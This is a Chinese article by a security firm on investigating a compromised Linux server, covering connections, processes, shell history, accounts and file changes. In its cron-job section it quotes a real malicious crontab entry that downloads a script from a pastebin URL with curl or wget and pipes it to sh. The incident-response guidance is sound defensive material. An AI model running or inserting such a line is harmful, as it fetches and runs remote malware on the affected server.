服务器被攻击了怎么办 如何排查攻击源

很多客户网站服务器被入侵,被攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站被篡改,被跳转,首页内容被替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序,以及网站被上传webshell的安全提醒,包括腾讯云提示服务器有木马文件,客户网站被攻击的第一时间,是需要立即处理的,降损失降到最低,让网站恢复正常的访问,由于每个客户找到我们SINE安全都是比较着急的,安全的处理时间也需要尽快的处理,根据我们的处理经验,我们总结了一些服务器被攻击,被黑的排查办法,专门用来检查服务器第一时间的安全问题,看发生在哪里,服务器是否被黑,是否被攻击,那些被篡改等等。

如何排查服务器被攻击?

首先我们会对当前服务器的IP,以及IP的地址,linux服务器名称,服务器的版本是centos,还是redhat,服务器的当前时间,进行收集并记录到一个txt文档里,接下来再执行下一步,对当前服务器的异常网络连接以及异常的系统进程检查,主要是通过netstat -an以及-antp命令来检查服务器存在哪些异常的IP连接。并对连接的IP,进行归属地查询,如果是国外的IP,直接记录当前进程的PID值,并自动将PID的所有信息记录,查询PID所在的linux文件地址,紧接着检查当前占用CPU大于百分之30的进程,并检查该进程所在的文件夹。

服务器被攻击了怎么办 如何排查攻击源

再一个要检查的地方是服务器的历史命令,history很多服务器被黑都会留下痕迹,比如SSH登录服务器后,攻击者对服务器进行了操作,执行了那些恶意命令都可以通过history查询的到,有没有使用wget命令下载木马,或者执行SH文件。检查服务器的所有账号,以及当前使用并登录的管理员账户,tty是本地用户登录,pst是远程连接的用户登录,来排查服务器是否被黑,被攻击,也可以检查login.defs文件的uid值,判断uid的passwd来获取最近新建的管理员账户。执行cat etc/passwd命令检查是否存在异常的用户账户,包括特权账户,UID值为0.

服务器被攻击了怎么办 如何排查攻击源

最重要的是检查服务器的定时任务,前段时间某网站客户中了挖矿病毒,一直占用CPU,查看了定时任务发现每15分钟自动执行下载命令,crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q-O- https://pastebin.com/raw/TS4NeUnd)|sh 代码如上,自动下载并执行SH木马文件。定时任务删都删不掉,最后通过检查系统文件查到了木马,并终止进程,强制删除。有些服务器被黑后,请立即检查2天里被修改的文件,可以通过find命令去检查所有的文件,看是否有木马后门文件,如果有可以确定服务器被黑了。

以上就是服务器被入侵攻击的检查办法,通过我们SINE安全给出的检查步骤,挨个去检查,就会发现出问题,最重要的是要检查日志,对这些日志要仔细的检查,哪怕一个特征都会导致服务器陷入被黑,被攻击的状态,也希望我们的分享能够帮助到更多需要帮助的人,服务器安全了,带来的也是整个互联网的安全。

因内容太旧或其它原因,不再提供查看全文,如有问题,请联系我们。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至253000106@qq.com举报,一经查实,本站将立刻删除。

发布者:SEO优化专员,转转请注明出处:https://www.chuangxiangniao.com/p/916471.html

(0)
上一篇 2025年1月4日 14:13:31
下一篇 2025年1月4日 14:14:06

相关推荐

  • 服务器安全,服务器安全组怎么设置

    服务器安全,服务器安全组怎么设置 一、服务器安全的重要性 在当今数字化时代,服务器安全是企业和个人不容忽视的重要问题。服务器作为存储和处理重要数据的核心设施,一旦遭受攻击或出现安全漏洞,可能会导致数据泄露、服务中断、业务受损等严重后果。因此…

    AI智能 2025年1月11日
    800
  • 指掌易完成2亿元B轮融资 提供移动业务安全服务

    A5创业网(公众号:iadmin5)10月15日报道,国内移动业务安全厂商指掌易科技宣布完成2亿元B轮融资,由高成资本领投,长安私人资本和苹果资本跟投,指数资本担任独家财务顾问。资金将主要用于产品研发与市场拓展等。 指掌易成立于2013年底…

    投资融资 2025年1月4日
    800
  • 专访云锁李科:专注于为站长保驾护航 锁住服务器安全

    大家好,欢迎来到A5访谈室!本期我们请到的嘉宾是椒图科技云锁项目创始人李科。北京椒图科技有限公司是国内最早研究操作系统安全的企业之一,专业从事信息安全技术的高科技企业,集研究、开发、生产、经营为一体。作为国内信息安全领域可提供全面解决方案的…

    创业故事 2025年1月4日
    1000
  • 人机共智!深信服发布安全托管服务MSS

    在2018深信服创新技术论坛上,深信服发布安全托管服务MSS。区别于传统人工安全服务以人为核心,服务水平参差不齐,深信服安全托管服务整合了专家的安全经验和机器学习进化以及永不休息的优势,通过安全运营平台的7*24小时监测,帮助用户持续评估风…

    2025年1月4日
    800
  • OLM SmartAM 3.2版本正式发布 | 自动化运维解决方案

    东方龙马(OLM)自主研发的OLM SmartAM 3.2版本正式上线。后台界面全面升级,视觉效果在3.1版本的基础上大幅度提升,同时,在数据库巡检模块中增加了诊断结果建议反馈,让用户在遇到问题的第一时间可以得知问题所在,得知解决方案,快速…

    2025年1月4日 服务器
    900
  • 高防服务器哪家好?亿速云高防服务器免费送30G防御

    近日,亿速云宣布旗下的香港高防云服务器价格全线下调,最高降幅达到50%,新用户最低1299元就可以享受4核4G高性能处理器, SSD硬盘,以及5M CN2高速带宽,默认30G防御起,还可以领到140元的新手红包。 DDoS攻击俗称洪水攻击,…

    2025年1月4日
    800
  • 数据备份:服务器迁移前最重要的一环

    服务器迁移是一项系统的、复杂的“大工程”,在开工之前,你就算忘了全世界,也一定要记得备份、备份、备份。因为许多事情看起来简单,但是实现的时候总会有一些不如意的地方,下面这则报道就是个很典型的例子。 据媒体报道,知名的社交网络平台MySpac…

    服务器 2025年1月4日
    800
  • 怎么查看服务器是否被入侵 从哪些方面入手?

    目前越来越多的服务器被入侵,以及攻击事件频频的发生,像数据被窃取,数据库被篡改,用户数据被脱裤,网站被强制跳转到恶意网站上,网站在百度的快照被劫持,等等的攻击症状层出不穷,当我们的服务器被攻击,被黑的时候我们第一时间该怎么去处理解决呢? 如…

    2025年1月4日 服务器
    900
  • 一次“惊心动魄”的服务器接管实战

    作为医院信息中心的运维人员,做的最多的工作就是日常巡检、故障恢复。只要办公室的电话铃一响,“战斗”就打响了。 只是,这次响的不是电话铃… 平地惊雷,机房传来“爆炸声” 8月20日8点50分,完成例行检查的我正在办公室里查看软件的…

    2025年1月4日
    800
  • 海外高防服务器的优势有哪些

    高防服务器的出现,是服务器安全和防御领域的又一壁垒,虽然中国也是有高防服务器的存在,但是和一些海外的服务器来说的话就不是很完善,面对突发问题的解决速度也是比较慢的,所以更多人会去选择它,下面我就来分析下为什么会这么多的人选择租用海外高防服务…

    服务器 2025年1月4日
    800

发表回复

登录后才能评论